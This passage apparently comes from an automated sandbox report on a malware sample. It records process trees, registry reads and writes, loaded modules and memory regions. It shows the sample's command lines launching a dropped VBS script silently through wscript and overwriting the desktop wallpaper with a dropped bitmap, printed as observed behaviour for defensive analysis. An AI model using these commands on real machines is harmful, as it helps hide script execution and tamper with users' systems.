| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xdfc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0x348, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0x374, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (35)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
4 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 |
Process #8: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MuA3C6WI.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Self Terminated |
| Monitor Duration | 00:01:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfa4 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FA8
0x
FEC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000400000 | 0x00400000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x0040ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00413fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00421fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00423fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00443fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00593fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00710000 | 0x007cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00ab0000 | 0x00de6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e2b0000 | 0x7e2b0000 | 0x7e3affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e3b0000 | 0x7e3b0000 | 0x7e3d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e3d3000 | 0x7e3d3000 | 0x7e3d3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3d9000 | 0x7e3d9000 | 0x7e3dbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3dc000 | 0x7e3dc000 | 0x7e3defff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3df000 | 0x7e3df000 | 0x7e3dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 153, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wscript.exe | os_pid = 0xe2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\F7t5Hk0D.bmp" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdfc |
| Parent PID | 0xf9c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
224
0x
2D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| reg.exe | 0x00900000 | 0x00952fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x04c2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c30000 | 0x04c30000 | 0x04c3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c51fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x04c50000 | 0x04c59fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004c60000 | 0x04c60000 | 0x04c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d00000 | 0x04d00000 | 0x04d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d10000 | 0x04d10000 | 0x04d10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d21fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d30000 | 0x04dedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x04f30000 | 0x0500efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05200000 | 0x05536fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76ed0000 | 0x76f2bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f8c0000 | 0x7f8c0000 | 0x7f9bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f9c0000 | 0x7f9c0000 | 0x7f9e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f9e5000 | 0x7f9e5000 | 0x7f9e5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9e8000 | 0x7f9e8000 | 0x7f9eafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9eb000 | 0x7f9eb000 | 0x7f9edfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9ee000 | 0x7f9ee000 | 0x7f9eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\F7t5Hk0D.bmp, size = 102, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x900000 |
|
1 |
Process #12: wscript.exe
30
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MuA3C6WI.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:21, Reason: Child Process |
| Unmonitor | End Time: 00:04:56, Reason: Self Terminated |
| Monitor Duration | 00:01:35 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe2c |
| Parent PID | 0xfa4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B44
0x
350
0x
5D8
0x
BE8
0x
5A8
0x
EB4
0x
57C
0x
668
0x
5AC
0x
F60
0x
8E4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| wscript.exe | 0x00020000 | 0x00047fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x04cbffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04ccffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04cd3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04ce1fff | Private Memory | rw |
|
|
|
- |
| wscript.exe.mui | 0x04ce0000 | 0x04ce2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004cf0000 | 0x04cf0000 | 0x04d03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x04e53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e60000 | 0x04e60000 | 0x04e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x04e71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e80000 | 0x04f3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04f80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050a0000 | 0x050a0000 | 0x050a0fff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x050b0000 | 0x050c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000050d0000 | 0x050d0000 | 0x050d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050e0000 | 0x050e0000 | 0x050e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005100000 | 0x05100000 | 0x05100fff | Pagefile Backed Memory | r |
|
|
|
- |
| mua3c6wi.vbs | 0x05110000 | 0x05110fff | Memory Mapped File | r |
|
|
|
|
| private_0x0000000005110000 | 0x05110000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x05123fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x052affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052b0000 | 0x052b0000 | 0x052b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052c0000 | 0x052c0000 | 0x052cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000052d0000 | 0x052d0000 | 0x05457fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005460000 | 0x05460000 | 0x055e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000055f0000 | 0x055f0000 | 0x069effff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x069f0000 | 0x06d26fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006d30000 | 0x06d30000 | 0x06e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006e30000 | 0x06e30000 | 0x06ee7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000006ef0000 | 0x06ef0000 | 0x06feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006ff0000 | 0x06ff0000 | 0x0702ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007030000 | 0x07030000 | 0x0712ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007130000 | 0x07130000 | 0x0716ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007170000 | 0x07170000 | 0x0717ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x07170000 | 0x07173fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000007180000 | 0x07180000 | 0x0727ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007280000 | 0x07280000 | 0x072bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000072c0000 | 0x072c0000 | 0x073bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000073c0000 | 0x073c0000 | 0x073fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007400000 | 0x07400000 | 0x074fffff | Private Memory | rw |
|
|
|
- |
| wshom.ocx | 0x07500000 | 0x0750cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000007510000 | 0x07510000 | 0x07510fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007520000 | 0x07520000 | 0x0755ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007560000 | 0x07560000 | 0x0765ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0x07660000 | 0x076a2fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x076b0000 | 0x076b3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x076c0000 | 0x0774afff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x07750000 | 0x07760fff | Memory Mapped File | r |
|
|
|
- |
| cversions.1.db | 0x07770000 | 0x07773fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000007770000 | 0x07770000 | 0x07770fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db | 0x07780000 | 0x07792fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000077a0000 | 0x077a0000 | 0x077a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x077b0000 | 0x077b3fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x73b90000 | 0x73e50fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x73e60000 | 0x73fbffff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x73fc0000 | 0x741c6fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x741d0000 | 0x74311fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x74320000 | 0x74336fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x74340000 | 0x74374fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x74420000 | 0x74436fff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x74440000 | 0x74449fff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x74450000 | 0x7445cfff | Memory Mapped File | rwx |
|
|
|
- |
| mpoav.dll | 0x74460000 | 0x74475fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x74480000 | 0x744a2fff | Memory Mapped File | rwx |
|
|
|
- |
| amsi.dll | 0x744b0000 | 0x744bcfff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x744c0000 | 0x7453efff | Memory Mapped File | rwx |
|
|
|
- |
